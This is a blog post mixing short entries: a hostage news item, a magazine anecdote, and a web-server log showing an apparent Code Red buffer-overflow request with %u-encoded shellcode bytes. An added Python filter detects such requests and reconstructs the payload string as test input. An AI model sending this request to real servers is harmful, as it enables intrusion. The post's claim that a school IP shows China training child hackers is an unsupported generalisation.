Automated Black Hat.

Just to support my “occupy land == bad”-theory posted yesterday, seventeen men and women seized a school in North Ossetia in Russia this morning, taking about 150 people hostage.

The attackers’ demands are said to include the withdrawal of Russian troops from neighbouring Chechnya.

Read the whole story over at BBC News. And probably on most other online newspapers. If you live in Russia, you can follow the situation live on television.

Last week I told you about my failed attempt to subscribe to Wired. I received a letter saying that my credit card had been declined. I never got around to giving subscribing a second try, which turned out to be a good thing, since a copy of the September issue of Wired was lying in my mailbox when I got home from work today. Maybe they decided to treat me to one year’s worth of free copies?

My involuntary honeypot at work is still active, and today it was actually subject to an attempted buffer overflow attack. The following request was sent to the server:

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u780
1%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u819
0%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

Notice the huge number of Xs filling the server buffer; the rest of the request is probably the code the attacker wanted executed once the buffer overflowed. I have no idea what would have happened if the attacker had been able to execute the code; I only know that my server is too dumb to do anything but return a 405 error message.
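As an added example (not code from the original post or its commenters), here is a small Python filter that flags request lines with the shape of the one above: a long run of filler characters in the query string combined with a cluster of IIS-style %uXXXX escapes or a .ida target. The request lines it is fed are constructed for the example, not taken from the server log, and the 100-character filler threshold is an assumption.

```python
import re

# Constructed sample request lines (not taken from the post's server log): a benign
# request, one shaped like the /default.ida request quoted above, and a near-miss.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /default.ida?" + "X" * 224
    + "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
    + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0",
    "GET /default.ida?" + "X" * 30 + " HTTP/1.0",
]

FILLER_RE = re.compile(r"(.)\1{99,}")             # 100+ repeats of one character (assumed threshold)
U_ESCAPE_RE = re.compile(r"%u([0-9a-fA-F]{4})")   # IIS-style %uXXXX escape


def decode_u_escapes(query):
    """Decode %uXXXX escapes to little-endian bytes so the payload can be inspected."""
    return b"".join(int(h, 16).to_bytes(2, "little") for h in U_ESCAPE_RE.findall(query))


def classify_request(line):
    """Return (suspicious, reasons) for one 'METHOD target VERSION' request line."""
    parts = line.split()
    if len(parts) < 2:
        return False, ["malformed"]
    path, _, query = parts[1].partition("?")
    reasons = []
    if path.lower().endswith(".ida"):             # ISAPI indexing-service extension
        reasons.append("ida-extension")
    if FILLER_RE.search(query):                   # long run of one byte = buffer filler
        reasons.append("long-filler")
    escapes = len(U_ESCAPE_RE.findall(query))
    if escapes >= 8:                              # a cluster of %u escapes = encoded code
        reasons.append(f"{escapes}-u-escapes")
    # Filler alone (a long but harmless token) is not enough; require a second signal.
    suspicious = "long-filler" in reasons and len(reasons) >= 2
    return suspicious, reasons


def scan(lines):
    """Return the indices of request lines that classify as suspicious."""
    return [i for i, line in enumerate(lines) if classify_request(line)[0]]


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        flagged, why = classify_request(line)
        print(flagged, why, line[:40])
```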

The IP address (211.153.188.82) actually belongs to the 26th Primary School in Beijing. The Chinese are certainly starting to teach their hackers the trade at an early stage.


  1. Hi
    The “GET /default.ida?XXXXX…..”, I would believe is the CodeRed. If you are running an IDS, I think you also should see that they are trying to execute “cmd.exe”.
    Since CodeRed was designed for hitting MS IIS, you should have nothing to fear.